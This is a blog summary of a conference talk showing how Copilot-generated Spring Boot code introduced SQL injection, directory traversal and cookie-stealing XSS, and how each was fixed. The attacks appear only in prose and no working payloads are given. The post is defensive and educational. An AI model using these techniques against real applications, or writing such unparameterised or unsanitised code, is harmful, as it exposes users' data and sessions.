Recent Posts
Archives

Posts Tagged ‘Copilot’

PostHeaderIcon [DevoxxUK2024] Breaking AI: Live Coding and Hacking Applications with Generative AI by Simon Maple and Brian Vermeer

Simon Maple and Brian Vermeer, both seasoned developer advocates with extensive experience at Snyk and other tech firms, delivered an electrifying live coding session at DevoxxUK2024, exploring the double-edged sword of generative AI in software development. Simon, recently transitioned to a stealth-mode startup, and Brian, a current Snyk advocate, demonstrate how tools like GitHub Copilot and ChatGPT can accelerate coding velocity while introducing significant security risks. Through a live-coded Spring Boot coffee shop application, they expose vulnerabilities such as SQL injection, directory traversal, and cross-site scripting, emphasizing the need for rigorous validation and security practices. Their engaging, demo-driven approach underscores the balance between innovation and caution, offering developers actionable insights for leveraging AI safely.

Accelerating Development with Generative AI

Simon and Brian kick off by highlighting the productivity boost offered by generative AI tools, citing studies that suggest a 55% increase in developer efficiency and a 27% higher likelihood of meeting project goals. They build a Spring Boot application with a Thymeleaf front end, using Copilot to generate a homepage with a banner and product table. The process showcases AI’s ability to rapidly produce code snippets, such as HTML fragments, based on minimal prompts. However, they caution that this speed comes with risks, as AI often prioritizes completion over correctness, potentially embedding vulnerabilities. Their live demo illustrates how Copilot’s suggestions evolve with context, but also how developers must critically evaluate outputs to ensure functionality and security.

Exposing SQL Injection Vulnerabilities

The duo dives into a search functionality for their coffee shop application, where Copilot generates a query to filter products by name or description. However, the initial code concatenates user input directly into an SQL query, creating a classic SQL injection vulnerability. Brian demonstrates an exploit by injecting malicious input to set product prices to zero, highlighting how unchecked AI-generated code can compromise a system. They then refactor the code using prepared statements, showing how parameterization separates user input from the query execution plan, effectively neutralizing the vulnerability. This example underscores the importance of understanding AI outputs and applying secure coding practices, as tools like Copilot may not inherently prioritize security.

Mitigating Directory Traversal Risks

Next, Simon and Brian tackle a profile picture upload feature, where Copilot generates code to save files to a directory. The initial implementation concatenates user-provided file names with a base path, opening the door to directory traversal attacks. Using Burp Suite, they demonstrate how an attacker could overwrite critical files by manipulating the file name with “../” sequences. To address this, they refine the code to normalize paths, ensuring files remain within the intended directory. The session highlights the limitations of AI in detecting complex vulnerabilities like path traversal, emphasizing the need for developer vigilance and tools like Snyk to catch issues early in the development cycle.

Addressing Cross-Site Scripting Threats

The final vulnerability explored is cross-site scripting (XSS) in a product page feature. The AI-generated code directly embeds user input (product names) into HTML without sanitization, allowing Brian to inject a malicious script that captures session cookies. They demonstrate both reflective and stored XSS, showing how attackers could exploit these to hijack user sessions. While querying ChatGPT for a code review fails to pinpoint the XSS issue, Simon and Brian advocate for using established libraries like Spring Utils for input sanitization. This segment reinforces the necessity of combining AI tools with robust security practices and automated scanning to mitigate risks that AI might overlook.

Balancing Innovation and Security

Throughout the session, Simon and Brian stress that generative AI, while transformative, demands a cautious approach. They liken AI tools to junior developers, capable of producing functional code but requiring oversight to avoid errors or vulnerabilities. Real-world examples, such as a Samsung employee leaking sensitive code via ChatGPT, underscore the risks of blindly trusting AI outputs. They advocate for education, clear guidelines, and security tooling to complement AI-assisted development. By integrating tools like Snyk for vulnerability scanning and fostering a culture of code review, developers can harness AI’s potential while safeguarding their applications against threats.

Links: